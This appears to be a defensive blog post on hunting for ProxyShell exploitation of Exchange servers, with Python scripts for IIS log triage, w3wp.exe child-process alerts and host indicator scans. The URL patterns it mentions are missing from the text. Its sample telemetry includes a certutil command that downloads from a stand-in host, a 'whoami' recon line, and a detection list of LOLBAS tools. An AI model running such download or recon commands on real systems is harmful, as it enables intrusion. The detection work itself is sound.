Over the past several months, Microsoft has been having a bit of a bad run with its popular email server platform: Exchange.
Earlier this year, a nation-state group called HAFNIUM was found to be exploiting Exchange servers with a set of high-impact vulnerabilities: an authentication bypass and a remote code execution (RCE). Collectively, these vulnerabilities were called "ProxyLogon". Recently, a new set of somewhat related but distinct vulnerabilities has emerged, called "ProxyShell".
ProxyShell consists of three different CVEs:
- CVE-2021-34473: Pre-auth remote code execution
- CVE-2021-34523: Post-auth code execution using Exchange PowerShell Remoting
- CVE-2021-31207: Post-auth code execution and file write
In a nutshell, the patches for ProxyLogon earlier in 2021 were incomplete and led to an entirely different set of vulnerabilities. One of the key indicators observed in ProxyShell exploit attempts is web requests to the URL:
This URL pattern is one of the key components for triggering the first stage of the three-exploit chain. If readers are searching for HTTP requests to this URL, make sure you are looking for both GET and POST requests. Why? The Nmap NSE script that scans for this vulnerability uses GET requests and examines the HTTP response code to determine whether a target is vulnerable. If the target returns a 302 status response, it is vulnerable. On the other hand, other proof-of-concept exploits all appear to use POST requests.
If readers are collecting IIS logs (usually under the ms:iis:auto sourcetype), my recommendation is to search for requests to the URLs:
Look for any HTTP response codes to those requests that are NOT in the 400 series (sc_status). Consider analysing the user agent (cs_user_agent) that sent the request, the source IP addresses (src), and/or the X-Forwarded-For IP addresses (x_forwarded_for).
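The IIS log triage described above, as an added example that is not part of the original post. It parses the IIS W3C log format, rejoins `cs-uri-stem` and `cs-uri-query` (IIS logs everything after `?` separately, so matching on the stem alone can miss the request), keeps matches whose status is not in the 400 series regardless of method, and counts hits per source IP, X-Forwarded-For address and user agent for pivoting. `SUSPECT_PATH_PATTERN` is a placeholder, not the real ProxyShell URL pattern, and the log lines are constructed with documentation-range addresses.

```python
# Added example (not from the original post): triage IIS W3C logs for
# requests to a suspect URL pattern. SUSPECT_PATH_PATTERN is a PLACEHOLDER to
# be replaced with the pattern from the vendor advisory. Field names follow
# the IIS W3C log format; cs(X-Forwarded-For) is only present when configured.
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterator

# PLACEHOLDER pattern: substitute the real URL pattern here.
SUSPECT_PATH_PATTERN = re.compile(r"/placeholder-suspect-path", re.IGNORECASE)

# Constructed sample log; addresses are documentation ranges, not real IoCs.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs(X-Forwarded-For) sc-status sc-substatus sc-win32-status time-taken
2021-08-20 10:01:02 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 192.0.2.10 Mozilla/5.0 - - 200 0 0 15
2021-08-20 10:02:03 10.0.0.5 GET /placeholder-suspect-path/x - 443 - 198.51.100.7 python-requests/2.25.1 - - 302 0 0 20
2021-08-20 10:02:04 10.0.0.5 POST /placeholder-suspect-path/x - 443 - 198.51.100.7 python-requests/2.25.1 - - 200 0 0 33
2021-08-20 10:03:05 10.0.0.5 GET /placeholder-suspect-path/x - 443 - 203.0.113.9 Mozilla/5.0 - - 404 0 2 5
"""


@dataclass(frozen=True)
class Hit:
    time: str
    method: str
    uri: str
    status: int
    src: str
    xff: str
    user_agent: str


def parse_w3c(text: str) -> Iterator[dict]:
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line encountered before a #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated line: skip rather than guess
        yield dict(zip(fields, values))


def find_suspect_requests(text: str, pattern: re.Pattern = SUSPECT_PATH_PATTERN) -> list:
    """Return requests whose stem+query matches the pattern and whose status
    is not in the 400 series, for any HTTP method (GET and POST alike)."""
    hits = []
    for rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "-")
        # IIS logs everything after '?' in cs-uri-query; match the rejoined URI
        uri = stem if query == "-" else f"{stem}?{query}"
        if not pattern.search(uri):
            continue
        status = int(rec.get("sc-status", "0"))
        if 400 <= status < 500:
            continue
        hits.append(Hit(
            time=f"{rec.get('date', '')} {rec.get('time', '')}",
            method=rec.get("cs-method", ""),
            uri=uri,
            status=status,
            src=rec.get("c-ip", ""),
            xff=rec.get("cs(X-Forwarded-For)", "-"),
            user_agent=rec.get("cs(User-Agent)", "-"),
        ))
    return hits


def summarize(hits: list) -> Counter:
    """Count hits per (source IP, X-Forwarded-For, user agent) for pivoting."""
    return Counter((h.src, h.xff, h.user_agent) for h in hits)


if __name__ == "__main__":
    found = find_suspect_requests(SAMPLE_IIS_LOG)
    for hit in found:
        print(hit)
    for key, count in summarize(found).items():
        print(count, key)
```

On the constructed sample, the 302 from the GET probe and the 200 from the POST both survive the filter while the 404 is dropped, which is the point of not filtering on method.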
As far as other post-exploitation detection is concerned, the old standby of "Do you have process creation logs?" (e.g., Group Policy Process Creation Auditing, Event ID 4688; Sysmon Event ID 1; etc.) and looking for unusual processes that have w3wp.exe as a parent process is a good place to start hunting for anomalous activity. Specifically, if w3wp.exe is the parent process of powershell.exe, cmd.exe, LOLBAS tools, or an unusually named executable that you have never seen before, it's time to take a closer look.
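The parent-process check described above, as an added example that is not part of the original post. It accepts either Sysmon Event ID 1 style records (`Image`/`ParentImage`) or 4688 style records (`NewProcessName`/`ParentProcessName`), flags any child of w3wp.exe that is a shell or a LOLBAS binary, and also flags any child not in an analyst-supplied baseline of expected children. The events, the baseline and the LOLBAS subset are constructed for the example.

```python
# Added example (not from the original post): flag children of w3wp.exe in
# process-creation telemetry. Handles Sysmon Event ID 1 style records
# (Image/ParentImage) and Windows 4688 style records
# (NewProcessName/ParentProcessName). Sample events below are constructed.
import ntpath
from dataclasses import dataclass

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Illustrative subset only; extend from the LOLBAS project list for production.
LOLBAS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
          "wscript.exe", "cscript.exe", "bitsadmin.exe", "msbuild.exe"}


@dataclass(frozen=True)
class Finding:
    child: str
    parent: str
    command_line: str
    reason: str


def _normalize(event: dict) -> tuple:
    """Map Sysmon or 4688 field names to (child image, parent image, command line)."""
    child = event.get("Image") or event.get("NewProcessName") or ""
    parent = event.get("ParentImage") or event.get("ParentProcessName") or ""
    cmd = event.get("CommandLine") or ""
    return child, parent, cmd


def triage_w3wp_children(events, baseline=frozenset()) -> list:
    """Return a Finding for every process spawned by w3wp.exe, except children
    whose basename is in the analyst-supplied baseline of expected children."""
    findings = []
    for ev in events:
        child, parent, cmd = _normalize(ev)
        # ntpath handles Windows paths even when this runs on a non-Windows host
        if ntpath.basename(parent).lower() != "w3wp.exe":
            continue
        name = ntpath.basename(child).lower()
        if name in SHELLS:
            reason = "shell spawned by IIS worker process"
        elif name in LOLBAS:
            reason = "LOLBAS binary spawned by IIS worker process"
        elif name not in baseline:
            reason = "child not in the baseline for w3wp.exe"
        else:
            continue
        findings.append(Finding(name, parent, cmd, reason))
    return findings


# Constructed sample telemetry: two Sysmon-shaped and two 4688-shaped records.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\maint.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"NewProcessName": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "csc.exe /noconfig /fullpaths"},
    {"NewProcessName": r"C:\Windows\System32\certutil.exe",
     "ParentProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/x"},
    {"Image": r"C:\ProgramData\unknown-tool.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "unknown-tool.exe"},
]
# Constructed baseline: children an analyst has observed w3wp.exe spawning in
# their own environment. Build this from your telemetry, not from this list.
SAMPLE_BASELINE = frozenset({"csc.exe"})

if __name__ == "__main__":
    for f in triage_w3wp_children(SAMPLE_EVENTS, SAMPLE_BASELINE):
        print(f"{f.reason}: {f.child} <- {f.parent} :: {f.command_line}")
```

The baseline argument is what keeps the "unknown child" rule useful: with an empty baseline every child of w3wp.exe is reported, which is a reasonable starting point on a server that should never spawn anything, and the list is then trimmed from observed, explained activity.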
Host-based indicators of compromise may include:
- Newly created files (.aspx) in any of the Microsoft Exchange installation subdirectories (e.g., `\inetpub\wwwroot\`, `\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\`)
- Newly created files and folders under the `ProgramData` directory
- Any recent modifications to the file `\Windows\System32\inetsrv\Config\applicationHost.config` (consider looking at the modification timestamps to see whether the file was recently modified)
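A check for the three host-based indicators listed above, as an added example that is not part of the original post. It walks the Exchange web directories for recently written `.aspx` files, lists recent entries under `ProgramData`, and reports a recently modified `applicationHost.config`. Paths are taken relative to a root directory so the same function can be pointed at a mounted disk image; the sample tree it runs against here is constructed in a temporary directory, and the lookback window of seven days is an assumption.

```python
# Added example (not from the original post): check for recently created .aspx
# files under the Exchange web directories, recent entries under ProgramData,
# and a recently modified applicationHost.config. Paths are relative to a root
# so the scan can target a live host, a mounted image, or a constructed tree.
import os
import tempfile
import time
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    kind: str
    path: str
    mtime: float


EXCHANGE_WEB_DIRS = [
    os.path.join("inetpub", "wwwroot"),
    os.path.join("Program Files", "Microsoft", "Exchange Server", "V15",
                 "FrontEnd", "HttpProxy", "owa", "auth"),
]
PROGRAMDATA = "ProgramData"
APPHOST_CONFIG = os.path.join("Windows", "System32", "inetsrv", "Config",
                              "applicationHost.config")


def scan_host(root: str, lookback_days: int = 7) -> list:
    """Return findings for entries modified within the lookback window.
    st_mtime is used throughout; on Windows, st_ctime (creation time) is
    worth checking as well, since a dropped file may carry a forged mtime."""
    since = time.time() - lookback_days * 86400
    findings = []
    # 1. recently written .aspx files in the Exchange web directories
    for rel in EXCHANGE_WEB_DIRS:
        for dirpath, _dirs, files in os.walk(os.path.join(root, rel)):
            for name in files:
                if name.lower().endswith(".aspx"):
                    path = os.path.join(dirpath, name)
                    mtime = os.stat(path).st_mtime
                    if mtime >= since:
                        findings.append(Finding("new-aspx", path, mtime))
    # 2. recently created files or folders anywhere under ProgramData
    for dirpath, dirs, files in os.walk(os.path.join(root, PROGRAMDATA)):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            mtime = os.stat(path).st_mtime
            if mtime >= since:
                findings.append(Finding("new-programdata-entry", path, mtime))
    # 3. applicationHost.config modified within the window
    cfg = os.path.join(root, APPHOST_CONFIG)
    if os.path.isfile(cfg):
        mtime = os.stat(cfg).st_mtime
        if mtime >= since:
            findings.append(Finding("apphost-config-modified", cfg, mtime))
    return findings


def build_sample_tree() -> str:
    """Construct a throwaway directory tree (not a real host) with one old and
    one fresh .aspx, a fresh ProgramData folder, and a fresh config file."""
    root = tempfile.mkdtemp(prefix="exchange-ioc-sample-")
    now = time.time()
    old = now - 90 * 86400

    def put(rel: str, mtime: float, content: bytes = b"sample") -> str:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.utime(path, (mtime, mtime))
        return path

    put(os.path.join(EXCHANGE_WEB_DIRS[0], "aspnet_client", "legit.aspx"), old)
    put(os.path.join(EXCHANGE_WEB_DIRS[0], "aspnet_client", "unexpected.aspx"), now)
    put(os.path.join(EXCHANGE_WEB_DIRS[1], "errorFE.aspx"), old)
    # creating this file also gives its new parent folder a current mtime
    put(os.path.join(PROGRAMDATA, "newtool", "payload.bin"), now)
    put(APPHOST_CONFIG, now, b"<configuration/>")
    return root


if __name__ == "__main__":
    for f in scan_host(build_sample_tree()):
        print(f"{f.kind}: {f.path} (mtime={time.ctime(f.mtime)})")
```

On the constructed tree this reports the fresh `.aspx`, both the new `ProgramData` folder and the file inside it, and the config file, and stays silent on the two old `.aspx` files.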
Huntress Labs has done an excellent job walking through all of the details regarding the vulnerabilities and indicators related to ProxyShell. Their write-up of the situation can be found here. Orange Tsai's write-up of the vulnerability chain for Pwn2Own is available here.